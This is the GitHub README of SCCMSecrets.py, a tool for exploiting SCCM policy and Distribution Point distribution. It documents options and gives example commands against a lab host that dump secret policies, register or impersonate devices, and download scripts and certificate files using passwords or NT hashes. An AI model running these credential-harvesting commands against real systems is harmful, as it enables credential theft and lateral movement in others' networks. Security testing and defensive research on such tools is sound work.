Skip to content

SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting, initial access and lateral movement.

Notifications You must be signed in to change notification settings

synacktiv/SCCMSecrets

Repository files navigation

SCCMSecrets

SCCMSecrets.py is an SCCM policies exploitation tool. It goes beyond NAA credentials extraction, and aims to provide a comprehensive approach regarding SCCM policies exploitation. The tool can be executed from various levels of privileges, and will attempt to uncover potential misconfigurations related to policies distribution. More detail regarding the tool and its usage is available in the associated article: https://www.synacktiv.com/publications/sccmsecretspy-exploiting-sccm-policies-distribution-for-credentials-harvesting-initial

Two subcommands are available: policies and files.

Policies

This subcommand interacts with an SCCM Management Point in order to dump the contents of all secret policies (including NAA configuration, task sequences containing credentials, or collection variables). To do so, an approved SCCM device is needed, which can be obtained in three ways.

  • If you do not provide a machine account, SCCMSecrets will attempt to register a device and abuse automatic device approval. This is a (non-default) SCCM configuration which automatically grants the "Approved" state to new devices registered anonymously.
  • If you provide a machine account, SCCMSecrets will register a new device using the authenticated registration endpoint. By default, SCCM will grant the "Approved" state to devices registered through this endpoint.
  • You can also provide an existing device (--use-existing-device). This argument expects a directory containing the guid.txt file (device GUID) and the key.pem file (device private key). This can be a device created by a previous SCCMSecrets execution, or the one corresponding to a compromised legitimate SCCM client.

Note that SCCM policies are associated with collections. Registering a new device will place this device in default collections - thus, only secret policies from default collections will be retrieved. This is why impersonating a compromised legitimate SCCM client with the --use-existing-device can be interesting. Indeed, this legitimate client could be part of custom collections associated with additional secret policies.

Output will be placed in a subdirectory of the loot directory (format: [timestamp]_policies).

$ python3 SCCMSecrets.py policies --help
                                                                                                                                                                                        
 Usage: SCCMSecrets.py policies [OPTIONS]                                                                                                                                               
                                                                                                                                                                                        
 Dump secret policies from an SCCM Management Point                                                                                                                                     
                                                                                                                                                                                        
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ *  --management-point     -mp      TEXT     The client's SCCM management point. Expects either a URL, or a hostname/IP (defaults to HTTP in the latter case) [default: None]         │
│                                             [required]                                                                                                                               │
│ *  --client-name          -cn      TEXT     [Optional] The name of the client that will be created in SCCM - or a random name if using an existing device [default: None] [required] │
│    --machine-name         -u       TEXT     [Optional] A machine account name. If not provided, SCCMSecrets will try to exploit automatic device approval [default: None]            │
│    --machine-pass         -p       TEXT     [Optional] The password for the machine account [default: None]                                                                          │
│    --machine-hash         -H       TEXT     [Optional] The NT hash for the machine account [default: None]                                                                           │
│    --registration-sleep   -rs      INTEGER  [Optional] The amount of time, in seconds, that should be waited after registrating a new device. A few minutes is recommended so that   │
│                                             the new device can be added to device collections (3 minutes by default, may need to be increased)                                       │
│                                             [default: 180]                                                                                                                           │
│    --use-existing-device  -d       TEXT     [Optional] This option can be used to re-run SCCMSecrets.py using a previously registered device ; or to impersonate a legitimate SCCM   │
│                                             client. In both cases, it expects the path of a folder containing a guid.txt file (the SCCM device GUID) and the key.pem file (the       │
│                                             client's private key). Note that a client-name value must also be provided to SCCMSecrets (but does not have to match the one of the     │
│                                             existing device)                                                                                                                         │
│                                             [default: None]                                                                                                                          │
│    --pki-cert             -c       TEXT     [Optional] The path to a valid domain PKI certificate in PEM format. Required when the Management Point enforces HTTPS and thus client   │
│                                             certificate authentication                                                                                                               │
│                                             [default: None]                                                                                                                          │
│    --pki-key              -k       TEXT     [Optional] The path to the private key of the certificate in PEM format [default: None]                                                  │
│    --verbose              -v                [Optional] Enable verbose output                                                                                                         │
│    --help                 -h                Show this message and exit.                                                                                                              │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

Files

This subcommand will index files stored on a Distribution Point and download interesting ones. SCCMSecrets will first attempt to identify if anonymous access is enabled (non-default). If this is the case, files can be indexed and downloaded without authentication. Otherwise, domain credentials will be needed.

It is possible to download files by extension. SCCMSecrets will index files of all packages hosted on the Distribution Point (resulting in an index.txt file with the Unix tree format), and it will download files with specified extensions. When providing an empty list of extensions, only file indexing will be performed. In both cases, from the produced index file, it is possible to use the --urls flag to download specific interesting files (without reindexing).

Output will be placed in a subdirectory of the loot directory (format: [timestamp]_files).

$ python3 SCCMSecrets.py files --help
                                                                                                                                                                                        
 Usage: SCCMSecrets.py files [OPTIONS]                                                                                                                                                  
                                                                                                                                                                                        
 Dump interesting files from an SCCM Distribution Point                                                                                                                                 
                                                                                                                                                                                        
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ *  --distribution-point  -dp      TEXT     An SCCM distribution point. Expects either a URL, or a hostname/IP (defaults to HTTP in the latter case) [default: None] [required]       │
│    --username            -u       TEXT     [Optional] A username for a domain account. If no account is provided, SCCMSecrets will try to exploit anonymous DP access                │
│                                            [default: None]                                                                                                                           │
│    --password            -p       TEXT     [Optional] The password for the domain account [default: None]                                                                            │
│    --hash                -H       TEXT     [Optional] The NT hash for the domain account (e.g. A4F49C406510BDCAB6824EE7C30FD852) [default: None]                                     │
│    --extensions          -e       TEXT     [Optional] Comma-separated list of extension that will determine which files will be downloaded when retrieving packages scripts. Provide │
│                                            an empty string to not download anything, and only index files                                                                            │
│                                            [default: .ps1, .bat, .xml, .txt, .pfx]                                                                                                   │
│    --urls                -f       TEXT     [Optional] A file containing a list of URLs (one per line) that should be downloaded from the Distribution Point. This is useful if you   │
│                                            already indexed files and do not want to download by extension, but rather specific known files                                           │
│                                            [default: None]                                                                                                                           │
│    --max-recursion       -r       INTEGER  [Optional] The maximum recursion depth when indexing files from the Distribution Point [default: 10]                                      │
│    --pki-cert            -c       TEXT     [Optional] The path to a valid domain PKI certificate in PEM format. Required when the Distribution Point enforces HTTPS and thus client  │
│                                            certificate authentication                                                                                                                │
│                                            [default: None]                                                                                                                           │
│    --pki-key             -k       TEXT     [Optional] The path to the private key of the certificate in PEM format [default: None]                                                   │
│    --verbose             -v                [Optional] Enable verbose output                                                                                                          │
│    --help                -h                Show this message and exit.                                                                                                               │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯

About HTTPS enforcement

By default, clients can interact with their Management Point or Distribution Point using plain HTTP. The SCCM installation may however be configured more securely by enforcing the use of HTTPS. When this is the case (for either the Management Point, the Distribution Point, or both), SCCM will require client certificate authentication using an internal PKI certificate with the "client authentication" purpose.

It is still possible to carry out the attacks presented above - however, a valid PKI certificate must be provided through the --pki-cert and --pki-key flags (PEM format). The Management Point / Distribution Point URLs should also be prefixed by https://.

Installation

You can install SCCMSecrets.py by cloning the repository and installing the dependencies.

$ git clone https://github.com/synacktiv/SCCMSecrets
$ cd SCCMSecrets
$ python3 -m venv .venv && source .venv/bin/activate
$ python3 -m pip install -r requirements.txt

Examples

Below are some example commands.

Policies

Retrieve secret policies without providing a machine account. This will attempt to exploit the automatic device approval misconfiguration (non-default configuration)

$ python3 SCCMSecrets.py policies -mp http://mecm.sccm.lab -cn 'test'

Retrieve secret policies by providing a machine account. This will work in default SCCM configurations

$ python3 SCCMSecrets.py policies -mp http://mecm.sccm.lab -u 'azule$' -p 'Password123!' -cn 'test'

Retrieve secret policies of an already existing device. The compromised_device folder contains a guid.txt and key.pem file.

$ python3 SCCMSecrets.py policies -mp http://mecm.sccm.lab --use-existing-device compromised_device/

Retrieve secret policies when the Management Point enforces HTTPS

$ python3 SCCMSecrets.py policies -mp https://mecm.sccm.lab -u 'azule$' -H '2B576ACBE6BCFDA7294D6BD18041B8FE' -cn 'test' --pki-cert ./cert.pem --pki-key ./key.pem

Files

Retrieve Distribution Point files without providing credentials. This will attempt to exploit anonymous DP access (non-default configuration)

$ python3 SCCMSecrets files -dp http://mecm.sccm.lab

Retrieve Distribution Point files with credentials. This will work in default SCCM configurations

$ python3 SCCMSecrets.py files -dp http://mecm.sccm.lab -u 'dave' -p 'dragon'

Retrieve files wih a specific list of extensions. Authenticate with the machine account's hash

$ python3 SCCMSecrets.py files -dp http://mecm.sccm.lab -u 'dave' -H 'F7EB9C06FAFAA23C4BCF22BA6781C1E2' --extensions '.txt,.xml,.ps1,.pfx,.ini,.conf'

Retrieve specific files from the Distribution Point by providing a list of URLs (1 by line)

$ python3 SCCMSecrets.py files -dp http://mecm.sccm.lab -u 'dave' -p 'dragon' --urls to_download.lst

Retrieve DP files when the Distribution Point enforces HTTPS

$ python3 SCCMSecrets.py files -dp https://mecm.sccm.lab -u 'dave' -p 'dragon' --pki-cert ./cert.pem --pki-key ./key.pem

About

SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting, initial access and lateral movement.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages